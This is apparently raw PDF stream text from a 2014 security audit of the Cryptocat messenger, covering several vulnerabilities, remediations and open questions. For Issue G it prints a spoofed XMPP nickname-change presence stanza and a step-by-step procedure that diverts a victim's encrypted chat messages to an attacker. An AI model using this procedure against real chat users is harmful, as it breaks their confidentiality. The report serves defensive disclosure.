Tj T* ET Q Q q 1 0 0 1 62.69291 555.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Observations of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface, confirmed by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 14 Tm 1.601395 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis: ) Tj /F1 10 Tf (In ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (buddyNotification\(\) ) Tj /F1 10 Tf (tests for 'main-Conversation') Tj T* 0 Tw (and shows the change of status only in that case.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 14 Tm .327485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (Show the status changes as they occur, and also when the user returns to the) Tj T* 0 Tw (main conversation.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm Q endstream endobj % 'R192': class PDFStream 192 0 obj % page stream << /Length 7380 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue G. Capture of Sent Messages by Nickname Change) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 26 Tm .082485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (An attacker is able to break the confidentiality of a one-to-one chat, by diverting the destination) Tj T* 0 Tw 2.201235 Tw (of outgoing chat messages and replacing the key used to encrypt them. The attack involves use of) Tj T* 0 Tw (nickname-change ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (messages, which are not sent by ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (but are acted on when received.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm q BT 1 0 0 1 0 38 Tm .962927 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (After the diversion, the attacker receives and is able to decrypt messages sent by the victim in) Tj T* 0 Tw 1.201318 Tw (the chat. The original recipient\(s\) do not receive these messages. The sender\(s\) see no indication that) Tj T* 0 Tw .918735 Tw (their sent messages have been diverted; however, they will not receive any further messages or files in) Tj T* 0 Tw (that chat from the original buddy or from the attacker.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL .499985 Tw (For example, suppose Mallory is the attacker and is targetting a one-to-one chat between Alice and Bob.) Tj T* 0 Tw 2.412093 Tw (Mallory first sets up a chat with Alice \(this need only last a short time\), and then sends a specific) Tj T* 0 Tw .465318 Tw (nickname-change message to Alice's client. After that point, Alice's messages sent to Bob will instead go) Tj T* 0 Tw .350651 Tw (to Mallory, encrypted using the keys established between Alice and Mallory \(and so readable by Mallory\).) Tj T* 0 Tw (Alice will receive no further messages in that chat.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.24936 Tw (The attack can optionally also be performed in the other direction, causing Bob's messages to Alice to) Tj T* 0 Tw .158935 Tw (instead be sent to and readable by Mallory. In that case Bob will receive no further messages or files from) Tj T* 0 Tw (Alice in the chat.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 14 Tm .800514 Tw 12 TL /F1 10 Tf 0 0 0 rg (This attack cannot be used to gain the contents of files. After this attack, files will ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (be sent encrypted) Tj T* 0 Tw (under Mallory's key. Instead files will not be sent at all after this attack.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 441.0236 cm q BT 1 0 0 1 0 38 Tm .495697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This attack requires only sending the victim \(Alice\) an ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (presence message indicating a) Tj T* 0 Tw .41784 Tw (nickname change. An ) Tj /F3 10 Tf (XMPP-BOSH ) Tj /F1 10 Tf (server \(operating over ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (or not\) will typically relay such messages) Tj T* 0 Tw .889269 Tw (without modification, and we have verified that the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service does so. Therefore, the) Tj T* 0 Tw (attack can be performed by any client that knows the conversation name.) Tj T* ET Q Q q 1 0 0 1 62.69291 411.0236 cm q BT 1 0 0 1 0 14 Tm .852126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue was verified by source code analysis and by experimentation. See ) Tj 0 0 .501961 rg (Appendix C:) Tj T* 0 Tw (Exploit Code for Issue G) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 369.0236 cm q BT 1 0 0 1 0 26 Tm 1.965814 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (clients do not support changing their nickname once logged in.) Tj T* 0 Tw .798443 Tw (However, the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol does support this functionality. 
A "nickname-change message" is a special) Tj T* 0 Tw (case of an ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (presence message using status code 303, such as:) Tj T* ET Q Q q 1 0 0 1 62.69291 291.2833 cm q q .952737 0 0 .952737 0 0 cm q 1 0 0 1 6.6 6.927412 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 492 72 re B* Q q BT 1 0 0 1 0 50 Tm 12 TL /F4 10 Tf 0 0 0 rg (<) Tj (presence xmlns="jabber:client" from="ccaudittest@conference.crypto.cat/mallory") Tj T* ( to="2716478293139059658259042@crypto.cat/854194958139059658455998") Tj (>) Tj T* ( ) Tj (<) Tj (status code="303") Tj (>) Tj (<) Tj (/status) Tj (>) Tj T* ( ) Tj (<) Tj (item nick="bob") Tj (>) Tj (<) Tj (/item) Tj (>) Tj T* (<) Tj (/presence) Tj (>) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 187.2833 cm q BT 1 0 0 1 0 86 Tm 1.486412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code has a ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (function that is intended to respond to such messages,) Tj T* 0 Tw .708735 Tw (indicating changes of nickname by other ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (clients. This function has an exploitable flaw: it does not) Tj T* 0 Tw .978935 Tw (verify that the new nickname is not already being used. So if Mallory starts a chat with the victim Alice,) Tj T* 0 Tw 1.912651 Tw (and then changes his nickname in that chat to Bob, then the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory connection replaces the) Tj T* 0 Tw 1.397674 Tw (Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Bob connection, overwriting its keys. However, due to an implementation detail of the message) Tj T* 0 Tw 3.51998 Tw (handling code explained below, the callbacks for the replaced connection still reference Mallory's) Tj T* 0 Tw 1.764269 Tw (nickname. Therefore, further messages sent by Alice to Bob are actually \(conveniently for the attack\)) Tj T* 0 Tw (relayed to Mallory.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 85.28329 cm q BT 1 0 0 1 0 86 Tm 1.928651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The reason why the message callbacks still reference Mallory's nickname is that they close over the) Tj T* 0 Tw .063059 Tw (original nickname when created, and ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (does not affect these closures. For example, the) Tj T* 0 Tw 1.810976 Tw (handler function created by ) Tj /F4 10 Tf (otrIncomingCallback\(buddy\) ) Tj /F1 10 Tf (at line 130 of ) Tj /F4 10 Tf (cryptocat.js ) Tj /F1 10 Tf (closes) Tj T* 0 Tw 2.769984 Tw (over the ) Tj /F4 10 Tf (buddy ) Tj /F1 10 Tf (argument in its lexical scope, which is always the original nickname; similarly for) Tj T* 0 Tw .622126 Tw /F4 10 Tf (otrOutgoingCallback\(buddy\) ) Tj /F1 10 Tf (at line 142. In the case of the outgoing callback, this helps the attack) Tj T* 0 Tw .732927 Tw (by routing messages to Mallory. In the case of the incoming callback, it hinders the attack by preventing) Tj T* 0 Tw 1.795318 Tw (Mallory from sending messages to Alice that would be interpreted as coming from Bob; instead such) Tj T* 0 Tw (messages would be added to the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory chat, which no longer exists.) Tj T* ET Q Q endstream endobj % 'R193': class PDFStream 193 0 obj % page stream << /Length 3857 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 26 Tm 1.771654 Tw 12 TL /F1 10 Tf 0 0 0 rg (The bug of closure over the original nickname has other effects in the UI, leading us to suspect that) Tj T* 0 Tw 1.082126 Tw /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (has never been tested. 
We have verified that the following procedure is sufficient to) Tj T* 0 Tw (work around these effects to reproduce the attack:) Tj T* ET Q Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Mallory starts a chat with Alice as normal.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 62 Tm /F1 10 Tf 12 TL .79528 Tw (Mallory shows the "Display Info" window for Alice, or simulates the effects of doing so. This step is) Tj T* 0 Tw .185318 Tw (needed to avoid an incidental bug that is triggered when the nickname change occurs before Mallory) Tj T* 0 Tw .069431 Tw (has sent any message in the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory chat. It also has the effect of causing the buddy entry for) Tj T* 0 Tw .034983 Tw (Mallory to disappear "cleanly" in Alice's user interface when the nickname change occurs \227 whereas) Tj T* 0 Tw .87186 Tw (if Mallory sent a message, Alice would receive a flashing notification in her buddy entry for Mallory) Tj T* 0 Tw (that would not disappear immediately.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 555.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.788555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Mallory sends a nickname-change message to the server using the code in ) Tj 0 0 .501961 rg (Appendix C: Exploit) Tj T* 0 Tw .973672 Tw (Code for Issue G) Tj 0 0 0 rg (. 
The ) Tj /F4 10 Tf (to ) Tj /F1 10 Tf (field of this message is given by his own ) Tj /F3 10 Tf (JID ) Tj /F1 10 Tf (ending in ) Tj /F4 10 Tf (/mallory) Tj /F1 10 Tf (, the) Tj T* 0 Tw 4.536647 Tw (status code is ) Tj /F4 10 Tf (<) Tj (status) Tj ( ) Tj (code="303"/) Tj (>) Tj /F1 10 Tf (, and the new nickname ) Tj /F4 10 Tf (bob ) Tj /F1 10 Tf (is specified using) Tj T* 0 Tw 1.615697 Tw /F4 10 Tf (<) Tj (item) Tj ( ) Tj (nick="bob"/) Tj (>) Tj /F1 10 Tf (. Note that Mallory appears to be sending a message to himself, but the) Tj T* 0 Tw .944692 Tw /F4 10 Tf (to= ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (from= ) Tj /F1 10 Tf (fields get swapped \(we do not know why\), and so Alice receives a message with) Tj T* 0 Tw /F4 10 Tf (from= ) Tj /F1 10 Tf (field ending in ) Tj /F4 10 Tf (/mallory ) Tj /F1 10 Tf (as required.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 549.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Mallory now receives Alice's messages to Bob exactly as though they had been sent to him.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 537.0236 cm Q q 1 0 0 1 62.69291 519.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (Remove the ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (handler.) Tj T* ET Q Q q 1 0 0 1 62.69291 519.0236 cm Q endstream endobj % 'R194': class PDFStream 194 0 obj % page stream << /Length 1407 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issues Without Known Exploits) Tj T* ET Q Q q 1 0 0 1 62.69291 705.0236 cm q BT 1 0 0 1 0 26 Tm .953735 Tw 12 TL /F1 10 Tf 0 0 0 rg (This section describes issues for which we have not discovered an exploit in the current ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (use.) 
Tj T* 0 Tw 2.11152 Tw (These issues could become exploitable when other code changes, so they represent some potential) Tj T* 0 Tw (future security risk.) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (CTR-mode Overflow) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q BT 1 0 0 1 0 38 Tm .156412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The CTR mode implementation in ) Tj /F4 10 Tf (mode-ctr.js ) Tj /F1 10 Tf (fails to carry when the increment of the least-significant) Tj T* 0 Tw 1.508555 Tw (word overflows. This means a re-used counter and confidentiality leak for messages longer than 2^32) Tj T* 0 Tw .621751 Tw (blocks, which is 2^36 bytes for ) Tj /F3 10 Tf (AES) Tj /F1 10 Tf (, with its 16-byte blocks. This is not exploitable in ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (because) Tj T* 0 Tw (message lengths are always shorter than this. \(The file transfer chunk size is \(2^16 - 1025\) bytes.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm Q endstream endobj % 'R195': class PDFStream 195 0 obj % page stream << /Length 6570 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Protocol Analysis, Design, and Implementation) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 26 Tm 3.311412 Tw 12 TL /F3 10 Tf 0 0 0 rg (Cryptocat ) Tj /F1 10 Tf (is pushing the boundaries of ) Tj /F3 10 Tf (usable, secure, and multiparty ) Tj /F1 10 Tf (messaging. By dint of this) Tj T* 0 Tw 2.043555 Tw (innovative niche, it would benefit as much or more from security-aware protocol analysis and design) Tj T* 0 Tw (collaboration as it does from code auditing and penetration testing.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 645.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Multiparty Chat) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm q BT 1 0 0 1 0 26 Tm 1.904651 Tw 12 TL /F1 10 Tf 0 0 0 rg (A key area of unresolved issues is the group-chat protocol design and related security features. The) Tj T* 0 Tw 2.71229 Tw (current ) Tj /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (is an in-house design and would benefit from protocol specification) Tj T* 0 Tw (refinement, design analysis, and potential design changes.) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.089269 Tw (In terms of product engineering, our intuition is that replacing this protocol with a community-developed) Tj T* 0 Tw .432485 Tw (standard will lead to better security in less time. This of course depends on such a community-developed) Tj T* 0 Tw (standard emerging.) Tj T* ET Q Q q 1 0 0 1 62.69291 471.0236 cm q BT 1 0 0 1 0 74 Tm 2.032485 Tw 12 TL /F1 10 Tf 0 0 0 rg (Unless a community standard emerges very quickly, it is still valuable to improve the security of the) Tj T* 0 Tw .448443 Tw /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, and we recommend this general roadmap: First, review the existing specification) Tj T* 0 Tw 1.643314 Tw (to empirically determine which security properties it provides, noting ambiguity when present. Second,) Tj T* 0 Tw .905984 Tw (rewrite the specification to follow from those properties \(in contrast to describing the procedures or data) Tj T* 0 Tw .719984 Tw (formats\). Third, separate out the procedures and data formats from the abstract protocol and its security) Tj T* 0 Tw 2.761235 Tw (goals. At this point solicit more scrutiny from the community. This work can also contribute to the) Tj T* 0 Tw (development of the community standard alluded to above.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 444.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (File Transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 390.0236 cm q BT 1 0 0 1 0 38 Tm 3.096136 Tw 12 TL /F1 10 Tf 0 0 0 rg (Like the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, the file-transfer features of ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (are developed in-house as) Tj T* 0 Tw .241163 Tw (integrated extensions to both ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (. We suggest that file transfer not be reenabled until a more) Tj T* 0 Tw .609318 Tw (secure protocol is available; our suggestions for such a protocol are described in ) Tj 0 0 .501961 rg (Remediation for Issues) Tj T* 0 Tw (A and B) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 363.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (OTR & Cryptographic Libraries) Tj T* ET Q Q q 1 0 0 1 62.69291 321.0236 cm q BT 1 0 0 1 0 26 Tm 1.239318 Tw 12 TL /F1 10 Tf 0 0 0 rg (This audit did not focus on the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (implementation, nor the cryptographic libraries used by ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* 0 Tw 1.514597 Tw (While we examined these dependencies as necessary for our investigations, these would benefit from) Tj T* 0 Tw (focused, targeted audits.) Tj T* ET Q Q q 1 0 0 1 62.69291 294.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (JavaScript Cryptography) Tj T* ET Q Q q 1 0 0 1 62.69291 252.0236 cm q BT 1 0 0 1 0 26 Tm 2.336647 Tw 12 TL /F1 10 Tf 0 0 0 rg (There are open unresolved issues with respect to ) Tj /F3 10 Tf (JavaScript) Tj /F1 10 Tf (-based security applications. These are) Tj T* 0 Tw .536651 Tw (probably more relevant for security research rather than security audit work, but sometimes the lines can) Tj T* 0 Tw (be blurry.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 222.0236 cm q BT 1 0 0 1 0 14 Tm 2.121412 Tw 12 TL /F1 10 Tf 0 0 0 rg (Two areas which concern us are delivery and verification of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (add-on, and side-channel) Tj T* 0 Tw (analysis.) Tj T* ET Q Q q 1 0 0 1 62.69291 192.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 156.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .225366 Tw (Conversations with guessable room names can be "burst-in-on". Does the documentation say to use) Tj T* 0 Tw (unguessable room names? \(Note that room names are always known to the server.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 150.0236 cm Q q 1 0 0 1 62.69291 90.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 2.039318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol appears to allow an attacker to force messages to be selectively dropped. It) Tj T* 0 Tw 3.59229 Tw (protects against message reordering, but forcing a message to be dropped will not prevent) Tj T* 0 Tw 1.191412 Tw (subsequent messages from the same buddy from getting through, and will not cause any warning.) Tj T* 0 Tw 21.19247 Tw (Verification: reading the ) Tj 0 0 .501961 rg (OTR v3 protocol specification) Tj 0 0 0 rg (, and the) Tj T* 0 Tw /F4 10 Tf (\(ctr) Tj ( ) Tj (<) Tj (=) Tj ( ) Tj (sessKeys.rcv_counter\) ) Tj /F1 10 Tf (check in the ) Tj /F4 10 Tf (handleDataMsg ) Tj /F1 10 Tf (function from ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (.)
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 90.02362 cm Q q 1 0 0 1 62.69291 84.02362 cm Q q 1 0 0 1 62.69291 84.02362 cm Q endstream endobj % 'R196': class PDFStream 196 0 obj % page stream << /Length 10985 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .323672 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not check for the possibility of downgrade attacks to ) Tj /F3 10 Tf (OTR v2) Tj /F1 10 Tf (. \(Both OTR v2 and OTR v3 are) Tj T* 0 Tw (enabled by default, and this default is not overridden by Cryptocat.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 735.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .139985 Tw (We tried to determine whether an attacker exploiting issue F could also prevent the notification in the) Tj T* 0 Tw (main conversation window, but were not able to establish whether or not that was possible.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 681.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.373555 Tw 12 TL /F1 10 Tf 0 0 0 rg (There may be the potential for inconsistent state between the user interface and the global) Tj T* 0 Tw /F4 10 Tf (currentConversation ) Tj /F1 10 Tf (variable if there is an exception in ) Tj /F4 10 Tf (switchConversation) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 675.0236 cm Q q 1 0 0 1 62.69291 615.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.448976 Tw 12 TL /F1 10 Tf 0 0 0 rg (\223Major new feature: ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (now automatically reconnects to conversations when disconnected,) Tj T* 0 Tw .651647 Tw (without troubling the user. ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (will automatically detect accidental disconnections and wait for) Tj T* 0 Tw 1.837976 Tw (the Internet connection to be re-established before reconnecting.\224 \(from ) Tj 0 0 .501961 rg (CHANGELOG.md) Tj 0 0 0 rg (\) Does) Tj T* 0 Tw .802765 Tw (that mean it is now possible for an attacker to edit out parts of a conversation without troubling the) Tj T* 0 Tw (user?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 615.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.080574 Tw 12 TL /F1 10 Tf 0 0 0 rg (Question: If the ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (parameter passed to the ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (library has the wrong type or is not long) Tj T* 0 Tw 1.504976 Tw (enough, ) Tj /F4 10 Tf (undefined ) Tj /F1 10 Tf (propagation could compromise confidentiality. What happens if a non-Array) Tj T* 0 Tw .000514 Tw (general object is passed as ) Tj /F3 10 Tf (IV) Tj /F1 10 Tf (? What happens if a short Array is passed? We suspect this could be a) Tj T* 0 Tw 1.330751 Tw (disastrous, silent security failure. 
We manually inspected every call site, and performed some live) Tj T* 0 Tw .164104 Tw (tests with assertions within ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (proper to gain confidence that the ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is the right type, size, and) Tj T* 0 Tw (has the correct element types and range.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 531.0236 cm Q q 1 0 0 1 62.69291 507.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .964976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Concern: There is a type-dependent return from ) Tj /F4 10 Tf (Cryptocat.getBytes\(\) ) Tj /F1 10 Tf (which actually causes) Tj T* 0 Tw (calls to ) Tj /F4 10 Tf (Cryptocat.encodedBytes\(1,) Tj ( ) Tj (...\) ) Tj /F1 10 Tf (to throw an exception.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 459.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 14 Tm 2.121797 Tw 12 TL /F1 10 Tf 0 0 0 rg (Concern: ) Tj /F4 10 Tf (Cryptocat.fileKeys[nickname] ) Tj /F1 10 Tf (is used for transfers in both directions. Is this a) Tj T* 0 Tw (problem?) Tj T* ET Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) 